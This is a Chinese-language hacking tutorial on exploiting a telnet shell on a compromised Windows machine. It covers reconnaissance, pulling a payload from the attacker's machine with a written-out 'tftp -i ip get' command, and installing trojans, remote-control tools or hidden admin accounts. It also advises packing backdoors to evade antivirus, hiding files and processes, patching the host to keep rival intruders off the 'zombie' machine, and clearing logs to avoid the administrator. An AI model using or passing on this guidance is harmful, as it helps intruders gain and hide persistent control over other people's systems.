講了不少有關(guān)于telnet服務(wù)的基礎(chǔ)內(nèi)容，以及一些設(shè)備系統(tǒng)的安裝。但是，對于初學(xué)者而言，不禁有這樣的迷惑：我可以用telnet來做什么呢？現(xiàn)在就讓我們來分析一下telnet的應(yīng)用都有哪些。

在telnet服務(wù)中該做什么

本來寫到上面就想結(jié)束了,不過許多朋友都說telnet上去后不知道該做什么了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什么?為什么不講具體做法?篇幅不夠嘛,以后我會一一解釋的.

1 查看系統(tǒng)信息

呵呵,其實就是隨處看看,看看他的系統(tǒng)配置和版本（用type c:\boot.ini來知道pro版或server版）,看看都裝了什么服務(wù)或軟件（從目錄名就可以知道了）,看看有什么重要或有趣的文件啦（唉,要是國外的機器,看也看不懂）,看看他的用戶情況,總之就是盡可能多的了解系統(tǒng),為一會裝后門摸底.

2 使用tftp傳送文件

想必大家都遇到過在telnet中傳輸文件的問題,因為我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用copy來傳輸文件.不過這樣反而麻煩,既然我們已經(jīng)得到了shell,我們可以用TFPT命令來完成這一切,什么是TFTP呢?

用TFTP(Trivial File Transfer Protocol)來實現(xiàn)文件的傳送是一種基于UDP連接的文件傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP服務(wù)器端軟件構(gòu)成一個完整的傳輸結(jié)構(gòu).它是這樣使用的: 首先運行本地的TFTP Server（比如tftpd32.exe）軟件并保證始終開啟直至傳輸全部完成, 然后在telnet服務(wù)中（當然你也可以在其他shell中）運行下面的命令:

C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe

其中ip為你自己機器的ip,且上傳文件要與TFTP服務(wù)器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了（其實是從tftp服務(wù)器下載來的）.

需要指出的是,如果使用代理IP,你將不能實現(xiàn)與外部網(wǎng)絡(luò)的文件傳送.因為你的代理網(wǎng)關(guān)在進行數(shù)據(jù)封裝的時候會將自己的IP地址加入到你的數(shù)據(jù)報中,代替你的內(nèi)部網(wǎng)絡(luò)地址,所以在外部網(wǎng)絡(luò)進行MAC尋址時是找不到你這臺TFTP服務(wù)器的.

3 安置后門

安置后門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞為主,或者是來修改主頁的,那么這些事情當然可以在安置后門之前做;如果你只是想得到一只肉雞,那就沒什么可說的了,安后門吧.

后門的種類繁多,也給我們提供了很大的選擇余地,能夠根據(jù)具體情況選擇合適的后門的確是一門學(xué)問.常用的后門一般有:木馬,asp木馬,遠程控制軟件,克隆帳戶,建立并隱藏帳戶,telnet,telnet擴展的shell,終端服務(wù)等.安置一個好的后門通常要注意以下幾點:

1 不會被防火墻查殺及阻礙通信:被加入病毒庫的后門最好加殼以逃過防火墻,盡量用低端口通信,以免被防火墻屏蔽.

2 最大限度增加隱蔽性:如果你選擇遠程控制軟件,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要盡量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet服務(wù)擴展,要注意文件和進程的隱藏;如果新開了終端服務(wù)（入侵前并沒有開）,一定要該掉3389這個顯眼的端口,且越低越好.

3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶,真是無知者無畏呀.所以安置后門的時候,想想管理員疏忽的地方會在哪里.

4 打補丁

如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的.怎么打補丁呢?這個也要問?想想你是怎么進來的吧.算了,提示一下,除了修補大的漏洞以外（上傳官方補丁并運行）,也要注意它的共享,ipc$共享（最好都關(guān)閉）,可疑端口,容易被利用的服務(wù)等.不過打補丁也要注意隱蔽性的,不要讓管理員發(fā)現(xiàn)大的改動.

5 清除日志

可以手動或利用軟件,如果不太會就去找相關(guān)教材吧,在這里我不詳細介紹了.